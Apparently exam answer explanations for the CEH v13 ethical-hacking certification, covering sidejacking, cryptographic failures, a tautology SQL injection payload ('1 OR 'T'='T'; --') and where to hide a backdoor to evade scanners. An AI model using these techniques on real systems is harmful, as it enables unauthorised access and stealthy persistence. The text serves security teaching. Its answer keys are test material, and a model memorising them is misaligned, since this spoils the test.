Zero-day exploits are considered the most dangerous mobile attack vector in CEH v13 Mobile Platform Hacking. These exploits abuse previously unknown vulnerabilities, meaning no patches, signatures, or defenses exist at the time of attack.
In healthcare environments, mobile devices access sensitive EHR systems and operate under strict compliance requirements. Zero-day exploits can bypass mobile OS security, sandboxing, and antivirus controls entirely.
App spoofing and Bluejacking are easier to detect and mitigate through user awareness and Bluetooth controls. Side-channel attacks are highly specialized and rare in enterprise mobile environments.
CEH v13 stresses that zero-day attacks pose the greatest risk due to lack of detection mechanisms, making Option A correct.

According to the Certified Ethical Hacker (CEH) System Hacking and Session Hijacking module, sidejacking is a form of session hijacking where an attacker passively intercepts network traffic to capture unencrypted session cookies. These cookies are then reused to impersonate the authenticated user without needing credentials.
CEH documentation explains that sidejacking commonly occurs on unencrypted HTTP connections, public Wi-Fi networks, or improperly secured internal networks. Once the session cookie is stolen, the attacker can replay it to gain access to the victim's active session.
Option B correctly describes this mechanism and directly matches CEH's definition of sidejacking.
Option A refers to perimeter exploitation, not session hijacking.
Option C describes social engineering, which is unrelated to sidejacking.
Option D is an example of cross-site scripting (XSS), not sidejacking.
CEH emphasizes HTTPS enforcement and secure cookie attributes as key countermeasures.

The best answer is B. Cryptographic Failures because the scenario centers on weak protection of sensitive data in transit, enabling an attacker to intercept and manipulate the information. In CEH-aligned web and application security concepts (and consistent with modern web risk categories), cryptographic failures occur when an application does not properly use cryptography or secure transport protections to ensure confidentiality and integrity of sensitive data. If transport encryption is missing, weak, or incorrectly configured, attackers can perform man-in-the-middle style interception, tamper with traffic, steal session material, and exfiltrate regulated data-leading to outcomes like identity theft and payment card fraud, exactly as described.
The references to cookie snooping and downgrade attacks further reinforce this. Cookie snooping is commonly associated with session cookies being exposed due to insecure transport (for example, lack of HTTPS, mixed content, or cookies missing secure attributes), allowing an attacker on the network path to capture session identifiers and hijack accounts. Downgrade attacks occur when an attacker forces a connection to use weaker security settings (such as older TLS versions or insecure cipher suites) or coerces a fallback from HTTPS to HTTP when protections like HSTS are absent or misapplied. Both issues are tightly linked to improper cryptographic configuration and transport-layer security weaknesses.
Why the other options are not the best match: Broken Access Control concerns authorization-what users are allowed to access-not interception/manipulation of traffic. Identification and Authentication Failures focus on login/session identity mechanisms (passwords, MFA, session handling) but the key failure here is the weakness of cryptographic protection for data in transit. Security Misconfiguration can be a contributing cause (e.g., misconfigured TLS), but the question emphasizes the resulting weakness category-insufficient cryptographic/transport protections-making Cryptographic Failures the most precise answer.
Therefore, MediVault's exposure to interception, manipulation, cookie snooping, and downgrade attacks most clearly indicates Cryptographic Failures.

This scenario represents a Tautology-Based SQL Injection, a fundamental SQL injection technique covered under the Web Application Hacking module in the CEH v13 curriculum. The defining characteristic of this attack is the injection of a condition that always evaluates to TRUE, thereby bypassing authentication or authorization controls.
In the given example, the injected input 1 OR 'T'='T'; -- manipulates the logical condition of the SQL query. A typical vulnerable login query may resemble:
SELECT * FROM users WHERE user_id = 1 AND password = 'input';
When the attacker submits the injected payload, the resulting SQL statement becomes:
SELECT * FROM users WHERE user_id = 1 OR 'T'='T'; --';
The expression 'T'='T' is a tautology, meaning it always evaluates to TRUE regardless of context. As a result, the database returns records without properly validating the user's credentials, granting unauthorized access.
According to EC-Council CEH v13, tautology-based SQL injection is classified as a Boolean-based injection technique where attackers exploit improper input validation to alter the logical flow of SQL queries. This attack does not depend on database error messages (as in Error-Based SQL Injection), does not extract data using UNION statements (Union-Based SQL Injection), and does not rely on response delays (Time-Based Blind SQL Injection).
CEH v13 emphasizes that such attacks are especially effective against login forms and authentication mechanisms when developers fail to implement input sanitization, parameterized queries, or prepared statements. This attack is one of the most common and exam-tested SQL injection types because it clearly demonstrates how flawed logic can compromise application security without advanced techniques.
Understanding tautology-based SQL injection is critical for ethical hackers, as it forms the foundation for identifying and mitigating more complex SQL injection variants.

In CEH v13 Maintaining Access, stealth and persistence are key goals after compromise. Placing a backdoor in a file type excluded from resource maps (such as image metadata, configuration files, or uncommon extensions) reduces the likelihood of discovery by automated scanners and integrity checks.
Option D is correct because many security tools focus on executable or commonly accessed web files. Files excluded from resource maps are less likely to be scanned or monitored.
Option A increases detection risk due to frequent changes. Option B increases signature visibility. Option C still exposes the file to access logs and monitoring.
CEH v13 highlights that attackers often hide backdoors in non-obvious locations to avoid detection.
Therefore, Option D is correct.